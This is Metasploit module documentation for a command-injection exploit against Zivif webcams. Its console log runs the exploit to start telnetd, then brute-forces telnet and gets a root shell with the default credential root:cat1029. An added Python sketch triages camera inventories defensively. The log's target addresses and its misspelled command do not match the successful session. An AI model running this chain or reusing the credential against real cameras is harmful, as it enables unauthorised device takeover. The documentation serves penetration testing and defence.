
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md

Description

This module exploits a remote command execution vulnerability in Zivif webcams. The vulnerability is known to affect versions up to and including v2.3.4.2103, and was reported as CVE-2017-17105.

This module has been tested successfully on versions v2.3.4.2103 and V4.7.4.2121.

Vulnerable Application

Unfortunately a virtual copy of this camera is not available.

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/unix/http/zivif_ipcheck_exec

  3. Do: set rhost [IP]

  4. Do: set PAYLOAD payload/cmd/unix/generic

  5. Do: set CMD telnetd

  6. Do: exploit

  7. Port 23 will now be open on the target
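For asset owners, the version statements in the Description and the port-23 side effect in step 7 can be turned into an inventory triage. The sketch below is an added example, not part of the Metasploit module or its documentation; the inventory rows, the action names and the numeric ordering of four-part version strings are assumptions.

```python
import re

# Version facts come from the module documentation; everything else is constructed.
STATED_MAX = (2, 3, 4, 2103)     # "prior to and including v2.3.4.2103"
ALSO_TESTED = {(4, 7, 4, 2121)}  # module also tested successfully on V4.7.4.2121


def parse_version(text):
    """Turn 'v2.3.4.2103' or 'V4.7.4.2121' into a tuple of ints, else None."""
    m = re.fullmatch(r"[vV]?(\d+)\.(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(part) for part in m.groups()) if m else None


def classify_firmware(text):
    version = parse_version(text)
    if version is None:
        return "unknown"
    # Assumption: dotted versions order numerically, field by field.
    if version <= STATED_MAX or version in ALSO_TESTED:
        return "affected"
    return "unlisted"  # not named in the documentation; not proof of a fix


def triage(firmware, telnet_open):
    """Map one inventory row to a (hypothetical) action for the asset owner."""
    state = classify_firmware(firmware)
    if telnet_open and state != "unlisted":
        # The verification steps end with port 23 open on the target, so a
        # listening telnet service on such a camera deserves investigation.
        return "investigate"
    if state == "affected":
        return "isolate"
    if state == "unknown" or telnet_open:
        return "review"
    return "ok"


# Constructed inventory rows: (address, firmware string, TCP/23 reachable).
INVENTORY = [
    ("10.0.0.11", "v2.3.4.2103", False),
    ("10.0.0.12", "V4.7.4.2121", True),
    ("10.0.0.13", "v2.3.3.1900", False),
    ("10.0.0.14", "V5.0.0.3000", True),
    ("10.0.0.15", "n/a", False),
]


def report(rows=INVENTORY):
    return {addr: triage(fw, telnet) for addr, fw, telnet in rows}
```
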

Scenarios

msf5 > use exploit/unix/http/zivif_ipcheck_exec
msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35
rhost => 192.168.0.35
msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd
CMD => telenetd
msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit

[*] Sending request
[+] Command sent successfully
[*] Exploit completed, but no session was created.
msf5 exploit(unix/http/zivif_ipcheck_exec) >
msf5 exploit(unix/http/zivif_ipcheck_exec) > back
msf5 > use auxiliary/scanner/telnet/telnet_login
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds
USERPASS_FILE => /root/creds
msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_login) > exploit

[!] 192.168.0.34:23 - No active DB -- Credential data will not be saved!
[+] 192.168.0.34:23 - 192.168.0.34:23 - Login Successful: root:cat1029
[*] 192.168.0.34:23 - Attempting to start session 192.168.0.34:23 with root:cat1029
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.34:23) at 2020-06-15 19:47:14 +0000
[-] 192.168.0.34:23 - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: )
[*] 192.168.0.34:23 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/telnet/telnet_login) >
msf5 auxiliary(scanner/telnet/telnet_login) > sessions

Active sessions
===============

  Id  Name  Type   Information                            Connection
  --  ----  ----   -----------                            ----------
  1         shell  TELNET root:cat1029 (192.168.0.34:23)  0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34)

msf5 auxiliary(scanner/telnet/telnet_login) >